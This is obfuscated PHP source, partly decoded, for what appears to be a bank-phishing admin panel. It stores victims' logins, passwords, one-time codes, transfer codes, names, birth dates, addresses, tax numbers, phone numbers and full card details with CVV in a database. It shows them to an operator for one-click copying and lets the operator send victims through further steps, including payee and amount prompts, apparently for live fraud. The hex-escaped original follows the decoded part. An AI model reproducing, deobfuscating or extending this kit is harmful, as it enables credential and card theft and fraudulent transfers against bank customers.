			\x9\x9\x9			\x9\x9\x9	</label>
			\x9	\x9				\x9\x9</div>
				\x9				\x9\x9</td>\xa	\x9\x9	\x9				\x9\x9<td>\xa\x9	\x9\x9\x9		\x9\x9\x9	\x9<div class='form-check'>
\x9\x9	\x9					\x9		\x9<label for='finishradio{$value["id"]}' class='form-check-label'>\xa	\x9\x9	\x9	\x9\x9\x9\x9\x9	\x9\x9<input type='radio' name='status' value='20' id='finishradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
	\x9\x9			\x9			\x9			<span>Finish</span>
\x9	\x9\x9		\x9		\x9		\x9</label>\xa		\x9\x9\x9\x9\x9	\x9			</div>\xa\x9\x9\x9\x9				\x9	\x9</td>
\x9\x9\x9			\x9		\x9</tr>
\x9	\x9\x9\x9\x9\x9		\x9\xa\x9		\x9		\x9	\x9</tbody>\xa		\x9	\x9		\x9</table>\xa\x9	\x9\x9\x9\x9	</div>\xa\x9		\x9\x9		<!-- End commands edit -->
\x9			\x9\x9	<div class='modal-footer' style='margin-top:-40px'>
	\x9\x9	\x9\x9		<button type='button' class='btn btn-secondary' onclick='close_btn()' >Close</button>
			\x9\x9			<button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>\xa\x9\x9		\x9\x9	</div>
	\x9\x9	\x9	</div>
			\x9	</div>\xa			\x9</form>
\x9		</div>	\x9\x9
\x9	\x9
\x9		"; } } if (isset($_GET["fetch_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "\xa\x9
			<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>
\x9	\x9\xa		\x9\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa\x9\x9		<input type='hidden' name='userid' value='{$value["id"]}'>\xa\x9	\x9	<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>
\x9\x9		<div class='modal-content' style='background-color: black;'>
	\x9\x9	\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa		\x9\x9\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>\xa\x9				<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>
	\x9\x9\x9\x9	<span aria-hidden='true' style='color:white'>&times;</span>\xa		\x9		</button>\xa	\x9			</div>\xa				\x9<div class='modal-body'>
\x9	\x9\x9\x9\x9<div class='form-group' style='margin-bottom:1rem'>
	\x9		\x9		<br>
\xa\x9\x9\x9\x9	\x9	<div class='data-group'>\xa	\x9	\x9\x9\x9		<label class='data-label'>User code</label>\xa	\x9		\x9\x9\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>\xa	\x9	\x9			</div>
		\x9\x9\x9\x9	<div class='data-group'>\xa\x9\x9\x9	\x9			<label class='data-label'>Multi code</label>\xa\x9\x9	\x9			\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrcode}'>
\x9\x9\x9\x9\x9		</div>\xa	\x9	\x9	\x9\x9<div class='data-group'>
\x9	\x9	\x9	\x9	<label class='data-label'>Password</label>\xa\x9	\x9	\x9\x9\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrpass}'>\xa		\x9\x9	\x9\x9</div>
		\x9				<div class='data-group'>\xa\x9\x9\x9	\x9			<label class='data-label'>OTP</label>\xa		\x9\x9\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$otpcode}'>
\x9	\x9				</div>
	\x9		\x9\x9	<div class='data-group'>
					\x9	\x9<label class='data-label'>Pay OTP</label>
			\x9\x9\x9	\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$paycode}'>
\x9\x9		\x9	\x9</div>\xa	\x9			\x9\x9<div class='data-group'>
	\x9	\x9\x9	\x9\x9<label class='data-label'>Full Name</label>
\x9			\x9\x9		<input onclick='copy_btn(this)' class='form-control' readonly value='{$fname}'>
	\x9	\x9		\x9</div>
							<div class='data-group'>
	\x9\x9\x9	\x9		<label class='data-label'>DOB</label>\xa	\x9	\x9		\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$dob}'>\xa			\x9\x9\x9	</div>
	\x9\x9\x9		\x9<div class='data-group'>
\x9\x9\x9	\x9	\x9	<label class='data-label'>Address</label>\xa\x9			\x9			<input onclick='copy_btn(this)' class='form-control' readonly value='{$usraddr}'>\xa	\x9\x9	\x9		</div>\xa\x9			\x9\x9\x9<div class='data-group'>\xa		\x9\x9	\x9		<label class='data-label'>NIF</label>
\x9\x9\x9\x9	\x9		<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrnif}'>\xa		\x9\x9		\x9</div>
\x9	\x9			\x9<div class='data-group'>
\x9	\x9\x9\x9			<label class='data-label'>Phone No.</label>\xa\x9\x9		\x9	\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$phonenum}'>\xa		\x9	\x9\x9	</div>\xa		\x9				<div class='data-group'>\xa	\x9\x9		\x9\x9	<label class='data-label'>CC No.</label>\xa\x9\x9\x9				\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$ccnum}'>
\x9	\x9			\x9</div>
	\x9\x9	\x9		<div class='data-group'>\xa\x9\x9	\x9	\x9\x9	<label class='data-label'>Expiry/CVV</label>\xa\x9\x9\x9	\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$expiry}/{$cvvnum}'>
					\x9\x9</div>
		\x9	\x9\x9\x9<div class='data-group'>
\x9\x9	\x9\x9			<label class='data-label'>IP/Device</label>
\x9\x9			\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>\xa\x9\x9	\x9		\x9</div>
\x9	\x9	\x9\x9\x9<br>
	\x9\x9	\x9\x9</div>\xa		\x9		\xa\x9\x9			<!-- END -->\xa	\x9\x9\x9\x9\xa\x9\x9	\x9	<div class='modal-footer' style='margin-top:-40px'>\xa	\x9	\x9	<button style='color:black;background-color:white' type='button' onclick='close_btn()' class='btn btn-lg btn-dark col-12' >CLOSE</button>
\x9			\x9
	\x9			</div>\xa\x9\x9	
\x9		</div>\xa\x9\x9	\xa\x9	\x9</div>
\x9\x9\x9</div>
\x9\x9\x9</div>
	\x9\x9</form>
\x9\x9\x9</div>
\x9		"; } } if (isset($_GET["counter"])) { $ipFile = "../../logs/visits.txt"; $activequery = mysqli_query($conn, "SELECT * FROM customers WHERE status <20"); $completequery = mysqli_query($conn, "SELECT * FROM customers WHERE status=20"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("usernum" => $userRows, "activenum" => $activeRows, "completednum" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["visitlog"])) { $ipFile = "../../logs/visitors.txt"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("visitorlog" => $logquery); echo json_encode($log); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["buzzoff"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=7"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["id"]; $queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id={$userid}"); if ($queryy) { $stat = "ok"; } else { $stat = "notok"; } } if ($stat == "ok") { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if ($_GET["type"] == "delete") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $query = mysqli_query($conn, "DELETE FROM customers WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } } goto Xv57R; AtyZK: include "margin.php"; goto RVXPC; mMHrq: ?>

Did this file decode correctly?

Original Code

<?php
 goto PVFaB; RyL6_: session_start(); goto PF46H; PVFaB: include "\x2e\56\57\56\x2e\x2f\x43\x4f\116\x46\111\x47\56\160\150\x70"; goto AtyZK; RVXPC: include "\x2e\56\x2f\x76\x65\156\x64\x6f\x72\57\61\60\x30\x2e\160\150\x70"; goto B_C5_; PF46H: function numeric($num) { if (preg_match("\57\136\133\60\55\x39\x5d\x2b\44\57", $num)) { $status = true; } else { $status = false; } return $status; } goto Dpqz8; Dpqz8: if ($_GET["\164\171\160\145"] == "\154\157\x67\x69\156") { if ($_POST["\165\163\x72\154\157\147\151\x6e"] and $_POST["\151\160"] and $_POST["\x75\141"]) { $usrlogin = $_POST["\165\163\162\154\x6f\147\x69\x6e"]; $ip = $_POST["\x69\160"]; $comment = "\x55\x73\x65\162\40\152\165\x73\164\x20\154\157\x67\147\145\x64\40\x69\x6e\164\157\x20\141\x63\143\x6f\165\x6e\164"; $ua = urlencode($_POST["\x75\141"]); $uniqueid = time(); if ($_SESSION["\163\164\141\162\x74\x65\144"] == "\x74\x72\165\x65") { $uniqueid = $_SESSION["\165\x6e\151\x71\x75\145\151\144"]; $query = mysqli_query($conn, "\x55\120\x44\x41\124\105\x20\x63\x75\x73\164\157\155\x65\162\x73\40\x53\x45\124\x20\163\164\141\164\165\x73\x3d\x31\x2c\x20\142\x75\x7a\x7a\x65\x64\75\x30\54\40\x75\x73\x72\154\x6f\147\151\x6e\75\x27{$usrlogin}\47\x2c\x20\x63\x6f\x6d\x6d\x65\x6e\164\x3d\47{$comment}\47\x2c\x20\165\163\x65\x72\141\147\145\x6e\x74\75\47{$ua}\x27\x2c\40\151\x70\x3d\47{$ip}\x27\40\x57\110\105\x52\x45\x20\x75\156\x69\161\165\145\151\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\141\x74\165\163" => "\157\x6b")); } else { echo json_encode(array("\x73\x74\x61\x74\x75\163" => "\x64\x62\40\x63\157\x6e\156\x20\x6e\157\164\x6f\x6b")); } } else { $_SESSION["\165\x6e\151\x71\165\145\151\144"] = $uniqueid; $_SESSION["\x73\164\141\x72\x74\x65\x64"] = "\x74\162\165\145"; $query = mysqli_query($conn, "\111\x4e\x53\x45\x52\124\40\111\x4e\x54\x4f\x20\x63\x75\163\x74\157\155\x65\x72\x73\x20\50\165\x73\x72\x6c\157\x67\151\156\x2c\40\x63\157\x6d\x6d\x65\x6e\x74\54\40\x69\x70\54\40\165\163\145\162\141\x67\145\x6e\x74\x2c\40\165\156\x69\161\165\145\151\144\x2c\x20\163\x74\141\x74\165\x73\51\x20\126\x41\114\x55\105\x53\40\50\47{$usrlogin}\47\x2c\40\47{$comment}\x27\54\40\47{$ip}\x27\54\x20\47{$ua}\x27\54{$uniqueid}\54\40\x31\51"); if ($query) { echo json_encode(array("\x73\x74\x61\x74\165\163" => "\x6f\x6b")); } else { echo json_encode(array("\163\x74\x61\x74\x75\x73" => "\144\x62\x20\x63\x6f\156\156\40\156\157\x74\157\x6b")); } } } } goto BkXNK; Xv57R: if ($_SESSION["\163\164\x61\162\164\x65\x64"] == "\164\x72\165\x65") { if ($_GET["\x67\145\x74\163\x74\141\164\x75\x73"] and numeric($_GET["\147\145\x74\163\164\141\x74\165\x73"]) == true) { $id = $_GET["\x67\x65\x74\x73\x74\141\x74\x75\163"]; $query = mysqli_query($conn, "\x53\x45\x4c\x45\103\124\40\x2a\40\x66\x72\x6f\x6d\x20\x63\165\x73\164\x6f\x6d\x65\x72\163\x20\127\110\105\122\x45\40\165\156\151\x71\x75\x65\151\144\75\x27{$id}\x27"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\x73\164\141\x74\x75\163"]; } } if ($_GET["\164\x79\x70\x65"] == "\115\x75\154\164\151\x2d\x63\x6f\x64\145") { if ($_POST["\165\x73\x72\143\x6f\144\145"] and $_POST["\x75\x73\145\162\x69\x64"] and numeric($_POST["\165\163\x65\x72\151\x64"]) == true) { $usrcode = $_POST["\x75\x73\x72\143\x6f\x64\145"]; $comment = "\115\x75\x6c\164\x69\x2d\x43\150\x61\x6e\x6e\145\x6c\40\x43\x6f\x64\145\40\x65\x6e\164\145\162\x65\x64\54\x20\165\163\145\162\40\x77\x61\151\x74\151\156\x67"; $uniqueid = $_POST["\x75\163\145\x72\151\x64"]; $query = mysqli_query($conn, "\125\120\104\101\124\105\x20\143\165\163\x74\x6f\x6d\145\162\163\40\123\105\x54\x20\165\163\162\143\157\x64\145\x3d\x27{$usrcode}\x27\54\40\x63\x6f\155\155\x65\x6e\164\x3d\47{$comment}\47\54\40\x73\x74\x61\x74\x75\x73\x3d\x32\54\40\142\165\x7a\172\x65\144\x3d\x30\40\127\x48\x45\x52\105\x20\165\x6e\x69\x71\165\145\151\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\164\x75\163" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\141\x74\x75\163" => "\115\x43\103\x20\105\162\x72\157\x72")); } } } if ($_GET["\x74\171\x70\x65"] == "\117\x54\x50") { if ($_POST["\x6f\164\160\143\x6f\x64\x65"] and $_POST["\165\x73\x65\x72\151\x64"] and numeric($_POST["\x75\163\145\162\x69\144"]) == true) { $otpcode = $_POST["\x6f\164\160\x63\157\144\x65"]; $comment = "\117\x54\120\x20\103\157\144\x65\40\145\x6e\164\x65\x72\145\144\54\40\165\163\145\x72\x20\x77\x61\151\x74\x69\x6e\147"; $uniqueid = $_POST["\x75\x73\x65\162\x69\144"]; $query = mysqli_query($conn, "\125\120\104\101\x54\x45\40\143\x75\x73\x74\157\155\x65\x72\163\x20\x53\105\124\x20\157\164\x70\x63\x6f\x64\145\x3d\47{$otpcode}\x27\54\x20\x63\x6f\x6d\155\x65\x6e\164\75\x27{$comment}\x27\x2c\x20\163\164\x61\x74\165\x73\x3d\63\x2c\40\x62\x75\172\172\145\144\x3d\60\x20\127\x48\x45\122\105\x20\165\156\151\161\165\x65\x69\144\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\x73\x74\x61\164\165\163" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\x61\164\165\163" => "\x4f\124\x50\x20\105\x72\x72\157\162")); } } } if ($_GET["\164\x79\x70\x65"] == "\101\x55\124\110") { if ($_POST["\x75\x73\x65\x72\x69\x64"] and numeric($_POST["\165\163\145\x72\151\x64"]) == true) { $comment = "\122\x65\141\x64\171\x20\164\157\x20\162\145\152\145\x63\164\x20\x70\141\171\x6d\145\x6e\164\x2c\40\x75\163\145\x72\40\167\141\x69\x74\x69\x6e\147"; $uniqueid = $_POST["\165\x73\x65\x72\151\144"]; $query = mysqli_query($conn, "\x55\x50\x44\101\124\x45\x20\143\165\x73\x74\157\155\x65\162\x73\40\x53\x45\x54\40\x63\x6f\155\x6d\145\x6e\164\x3d\47{$comment}\x27\x2c\40\163\x74\x61\x74\x75\163\x3d\x34\54\40\142\x75\x7a\x7a\x65\144\75\x30\x20\x57\x48\x45\122\105\40\x75\x6e\151\x71\165\x65\151\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\141\164\x75\x73" => "\x6f\x6b")); } else { echo json_encode(array("\163\164\141\164\x75\x73" => "\101\165\x74\150\40\105\162\162\x6f\162")); } } } if ($_GET["\164\x79\160\145"] == "\125\163\x65\162\x49\156\146\x6f") { if ($_POST["\x66\156\141\155\145"] and $_POST["\x64\x6f\142"] and $_POST["\165\x73\162\141\144\x64\x72"] and $_POST["\x75\x73\x72\x6e\x69\x66"] and $_POST["\165\163\145\162\151\144"] and numeric($_POST["\x75\163\145\162\151\x64"]) == true) { $fname = $_POST["\146\x6e\x61\x6d\145"]; $dob = $_POST["\x64\x6f\x62"]; $usraddr = $_POST["\x75\163\x72\141\144\144\x72"]; $usrnif = $_POST["\x75\x73\x72\156\151\146"]; $comment = "\102\x61\163\151\x63\x20\x49\156\146\157\40\105\x6e\164\x65\x72\145\x64\54\x20\165\163\145\162\x20\167\x61\151\x74\151\x6e\x67"; $uniqueid = $_POST["\165\x73\x65\x72\x69\x64"]; $query = mysqli_query($conn, "\125\120\x44\101\124\x45\x20\x63\165\163\164\157\155\145\x72\x73\40\123\x45\x54\40\146\156\x61\x6d\x65\x3d\x27{$fname}\47\x2c\40\144\x6f\x62\75\x27{$dob}\x27\x2c\x20\165\163\x72\x61\x64\x64\162\75\47{$usraddr}\47\54\x20\165\163\162\156\x69\146\x3d\47{$usrnif}\x27\x2c\x20\x63\x6f\155\155\145\x6e\x74\75\47{$comment}\47\x2c\40\x73\164\141\164\165\x73\75\65\54\40\142\165\x7a\x7a\145\x64\x3d\x30\x20\127\x48\105\122\x45\x20\x75\156\x69\x71\x75\145\x69\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\x74\165\163" => "\x6f\153")); } else { echo json_encode(array("\163\164\141\x74\x75\x73" => "\111\x6e\146\x6f\x20\x45\162\162\x6f\x72")); } } } if ($_GET["\164\x79\160\145"] == "\x43\x43\x44\x65\x65\x74\x73") { if ($_POST["\x63\143\x6e\165\x6d"] and $_POST["\143\x76\x76\156\x75\155"] and $_POST["\x65\x78\160\x69\162\171"] and $_POST["\x75\163\145\x72\x69\x64"] and numeric($_POST["\x75\163\145\162\x69\144"]) == true) { $ccnum = $_POST["\x63\x63\156\165\x6d"]; $cvvnum = $_POST["\x63\166\x76\156\165\155"]; $expiry = $_POST["\145\x78\160\x69\x72\x79"]; $comment = "\103\x43\x20\104\145\145\x74\x73\x20\x45\x6e\164\x65\x72\x65\144\x2c\40\165\x73\145\x72\40\x77\141\x69\x74\151\156\x67"; $uniqueid = $_POST["\165\163\x65\162\151\x64"]; $query = mysqli_query($conn, "\x55\x50\104\101\124\x45\x20\143\x75\163\x74\x6f\x6d\145\x72\163\x20\x53\105\x54\x20\x63\x63\x6e\165\155\x3d\x27{$ccnum}\x27\x2c\40\143\x76\x76\x6e\165\x6d\75\x27{$cvvnum}\47\54\x20\145\x78\160\x69\162\171\x3d\47{$expiry}\47\x2c\x20\143\x6f\155\155\x65\x6e\164\75\47{$comment}\x27\54\x20\163\164\141\164\165\163\75\66\54\x20\142\x75\172\172\145\x64\75\60\40\127\110\105\122\105\x20\x75\x6e\151\161\165\x65\151\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\141\164\x75\x73" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\141\164\x75\163" => "\x43\x43\40\105\162\x72\x6f\x72")); } } } if ($_GET["\x74\171\x70\x65"] == "\120\150\x6f\156\x65") { if ($_POST["\x70\x68\157\x6e\x65\x6e\165\x6d"] and $_POST["\x75\x73\145\x72\x69\x64"] and numeric($_POST["\x75\163\x65\x72\x69\144"]) == true) { $phonenum = $_POST["\x70\x68\x6f\x6e\145\x6e\165\x6d"]; $comment = "\120\150\x6f\156\x65\40\116\x6f\x2e\x20\145\156\x74\145\162\x65\144\54\x20\165\163\145\x72\40\x77\x61\151\x74\151\156\x67"; $uniqueid = $_POST["\165\163\x65\162\151\x64"]; $query = mysqli_query($conn, "\x55\x50\x44\101\124\x45\x20\143\x75\x73\x74\157\155\x65\162\x73\40\123\105\x54\40\x70\x68\157\156\145\x6e\165\x6d\x3d\47{$phonenum}\47\54\40\143\157\155\155\x65\x6e\x74\75\x27{$comment}\x27\x2c\x20\163\164\141\164\x75\x73\x3d\67\54\x20\x62\165\x7a\x7a\145\x64\x3d\x30\40\127\110\105\122\x45\40\x75\x6e\x69\x71\165\145\x69\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\141\x74\165\163" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\x61\x74\165\x73" => "\x50\x68\157\156\145\40\x45\162\x72\157\162")); } } } if ($_GET["\x74\x79\x70\145"] == "\x50\101\131") { if ($_POST["\x70\x61\x79\143\157\x64\x65"] and $_POST["\165\x73\145\162\151\144"] and numeric($_POST["\x75\163\x65\x72\x69\144"]) == true) { $paycode = $_POST["\x70\141\x79\x63\157\x64\x65"]; $comment = "\124\162\141\x6e\163\x66\145\162\x20\x63\157\144\x65\40\145\x6e\x74\145\x72\145\144\54\x20\165\x73\x65\x72\40\167\x61\x69\164\x69\x6e\x67"; $uniqueid = $_POST["\x75\163\145\162\151\x64"]; $query = mysqli_query($conn, "\125\120\x44\101\x54\105\x20\x63\165\163\x74\157\155\145\162\x73\40\x53\105\124\40\160\141\x79\x63\157\144\145\x3d\47{$paycode}\47\54\40\143\157\155\x6d\x65\x6e\x74\75\x27{$comment}\47\x2c\x20\x73\164\141\x74\165\163\x3d\70\x2c\x20\142\165\x7a\x7a\145\x64\x3d\60\40\x57\x48\105\x52\105\40\x75\x6e\151\x71\165\x65\x69\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\141\164\165\x73" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\141\x74\x75\163" => "\x50\x61\171\40\105\x72\x72\x6f\x72")); } } } if ($_GET["\164\x79\x70\145"] == "\120\x61\x73\x73\167\157\162\144") { if ($_POST["\x75\x73\x72\x70\141\163\x73"] and $_POST["\165\x73\145\x72\x69\x64"] and numeric($_POST["\165\163\x65\162\151\x64"]) == true) { $usrpass = $_POST["\165\163\162\160\141\163\163"]; $comment = "\x50\141\163\x73\40\x65\x6e\164\x65\x72\x65\144\x2c\x20\x75\163\145\x72\40\x77\141\x69\164\151\x6e\x67"; $uniqueid = $_POST["\165\163\145\162\151\144"]; $query = mysqli_query($conn, "\x55\120\104\101\124\105\x20\143\165\x73\164\x6f\155\x65\x72\x73\40\123\105\x54\x20\x75\163\x72\160\x61\163\163\x3d\47{$usrpass}\x27\54\40\x63\157\155\x6d\145\156\164\x3d\x27{$comment}\47\x2c\40\163\164\141\164\x75\163\x3d\71\x2c\40\x62\165\172\172\x65\x64\x3d\x30\40\x57\x48\105\x52\x45\x20\x75\x6e\151\161\165\x65\x69\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\x74\x75\x73" => "\x6f\153")); } else { echo json_encode(array("\163\164\x61\164\x75\163" => "\120\x61\163\x73\x20\x45\162\x72\x6f\162")); } } } } goto mMHrq; B_C5_: include "\x2e\56\57\x76\x65\156\144\157\162\57\62\x30\x30\56\x70\x68\x70"; goto RIqW8; RIqW8: include "\56\56\x2f\x76\x65\x6e\x64\x6f\x72\57\63\x30\x30\x2e\160\x68\160"; goto ih13o; TbMN2: include "\x2e\56\57\x76\145\x6e\x64\157\x72\57\156\145\x74\143\x72\x61\146\x74\137\143\x68\x65\143\153\56\160\150\160"; goto RyL6_; ih13o: include "\56\56\x2f\x76\x65\156\144\157\x72\57\x69\156\144\x65\170\x2e\x70\150\160"; goto TbMN2; BkXNK: if ($_SESSION["\141\x64\155\x69\x6e\137\x6c\157\147\x67\x65\x64"] == "\x74\162\165\145") { if ($_GET["\x74\171\x70\145"] == "\x63\x6f\x6d\x6d\155\x61\x6e\144") { if ($_POST["\x75\163\145\x72\151\x64"] and numeric($_POST["\165\x73\145\x72\x69\144"]) == true and $_POST["\x73\x74\x61\x74\x75\163"] and numeric($_POST["\163\164\x61\x74\165\163"]) == true) { $userid = $_POST["\x75\x73\x65\162\x69\144"]; $status = $_POST["\163\x74\141\x74\x75\163"]; $char1 = $_POST["\143\x68\141\162\61"]; $char2 = $_POST["\143\150\141\162\62"]; $char3 = $_POST["\143\x68\141\162\63"]; $amount = $_POST["\x61\x6d\157\x75\156\x74"]; $payeeName = $_POST["\x70\x61\171\x65\x65\116\x61\155\x65"]; $comment = "\x41\x64\155\151\156\x20\150\141\163\x20\x73\x65\156\164\40\143\x6f\155\x6d\141\156\144"; if ($char1 != null and $char1 != '' and $char2 != null and $char2 != '' and $char3 != '' and $char3 != '' and $amount == '' and $amount == null) { $query = mysqli_query($conn, "\x55\120\x44\101\124\x45\40\x63\x75\x73\x74\157\x6d\145\162\x73\x20\x53\x45\124\x20\143\157\x6d\155\x65\x6e\x74\75\x27{$comment}\47\54\40\163\x74\x61\x74\165\x73\75{$status}\54\x20\143\150\141\x72\x31\x3d\47{$char1}\x27\54\x20\143\x68\x61\x72\62\75\47{$char2}\47\x2c\x20\143\x68\x61\x72\x33\x3d\47{$char3}\47\x20\x57\110\105\122\105\x20\x69\x64\x3d{$userid}"); } else { if ($amount != null and $amount != '' and $payeeName != null and $payeeName != '' and $char2 == null and $char2 == '') { $query = mysqli_query($conn, "\x55\120\104\101\124\105\40\143\165\163\x74\x6f\155\x65\162\163\40\x53\x45\124\x20\x63\x6f\x6d\155\x65\x6e\x74\x3d\x27{$comment}\47\54\40\x73\164\x61\164\x75\x73\75{$status}\54\40\160\x61\x79\x65\145\116\x61\155\x65\x3d\x27{$payeeName}\x27\54\40\x61\155\157\x75\156\164\75\x27{$amount}\x27\40\x57\110\x45\122\105\40\x69\144\75{$userid}"); } else { $query = mysqli_query($conn, "\x55\120\104\101\124\x45\40\143\x75\163\164\157\x6d\x65\162\x73\40\x53\x45\124\x20\163\x74\141\164\x75\x73\75{$status}\x20\127\110\x45\x52\105\x20\151\144\75{$userid}"); } } if ($query) { echo json_encode(array("\163\164\141\x74\165\163" => "\x6f\153")); } else { echo json_encode(array("\163\x74\x61\164\165\163" => "\x64\x62\40\x63\157\x6e\x6e\x20\145\162\162\x6f\x72")); } } else { echo json_encode(array("\163\x74\141\x74\165\163" => "\143\157\155\155\141\x6e\x64\40\145\162\x72\157\162")); } } if (isset($_GET["\147\x65\x74\x5f\x73\165\142\155\151\x74\x74\x65\144"])) { $query = mysqli_query($conn, "\x53\x45\114\x45\x43\124\x20\x2a\x20\x46\x52\x4f\115\40\x63\x75\x73\x74\x6f\x6d\145\162\163\40\x57\x48\x45\x52\x45\40\163\164\141\x74\165\x73\74\75\x37\40\141\156\x64\40\x62\x75\172\172\x65\144\x3d\60"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("\x73\x74\x61\x74\x75\x73" => "\157\x6b")); } else { echo json_encode(array("\x73\x74\x61\x74\x75\x73" => "\x6e\157\164\157\153")); } } else { echo json_encode(array("\163\x74\x61\164\x75\163" => "\156\x6f\x74\x6f\x6b")); } } if (isset($_GET["\146\x65\164\143\150\x5f\160\143\x5f\x64\141\164\141"])) { $query = mysqli_query($conn, "\123\105\x4c\105\x43\124\x20\52\x20\146\162\x6f\155\x20\143\x75\163\164\x6f\x6d\145\162\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\163\164\x61\x74\x75\x73"] == 500) { $info = "\74\163\x70\x61\x6e\40\x63\x6c\141\163\x73\x3d\x22\142\x61\144\147\x65\40\x62\141\x64\147\x65\x2d\167\x61\x72\x6e\x69\156\x67\x22\x3e\x45\x61\163\x74\145\x72\x20\x65\x67\147\x3c\57\x73\x70\x61\156\x3e"; } elseif ($value["\x73\x74\x61\x74\x75\163"] == 1) { $info = "\x3c\x73\160\x61\x6e\x20\143\x6c\141\x73\x73\x3d\x22\x62\x61\144\147\x65\x20\x62\141\x64\147\145\55\151\x6e\146\157\42\76\116\x65\x77\x20\x55\x73\145\x72\74\57\163\x70\x61\x6e\76"; } elseif ($value["\163\x74\141\x74\165\163"] == 2) { $info = "\74\163\x70\141\x6e\x20\x63\154\141\x73\163\75\x22\142\x61\144\x67\145\x20\x62\141\144\x67\145\55\x70\x72\x69\x6d\141\x72\171\x22\x3e\x53\x75\x62\155\x69\x74\164\x65\144\x20\115\165\154\164\151\40\103\157\x64\x65\74\x2f\163\160\x61\156\x3e"; } elseif ($value["\163\164\x61\x74\x75\x73"] == 3) { $info = "\x3c\163\x70\141\x6e\40\143\154\141\x73\163\x3d\x22\142\141\144\147\145\40\x62\141\144\147\x65\x2d\x70\x72\151\x6d\141\x72\171\x22\x3e\123\x75\142\x6d\x69\164\x74\x65\144\40\117\124\120\74\57\x73\160\x61\156\x3e"; } elseif ($value["\163\x74\141\x74\165\x73"] == 4) { $info = "\x3c\x73\160\x61\x6e\40\x63\x6c\141\163\x73\75\x22\x62\141\144\147\x65\x20\x62\141\144\x67\145\x2d\160\162\x69\x6d\141\x72\x79\42\76\123\x75\x62\x6d\151\x74\x74\145\x64\x20\101\x6e\x73\x77\x65\x72\x3c\57\x73\160\141\x6e\76"; } elseif ($value["\x73\164\x61\x74\165\163"] == 5) { $info = "\74\163\160\141\x6e\x20\143\154\141\x73\x73\75\x22\142\x61\144\x67\145\40\x62\x61\x64\x67\145\55\160\162\x69\x6d\141\162\x79\42\76\123\x75\142\155\151\x74\164\145\x64\x20\x42\141\x73\151\x63\x20\x49\156\x66\157\x3c\57\163\160\x61\156\76"; } elseif ($value["\163\x74\141\x74\x75\163"] == 6) { $info = 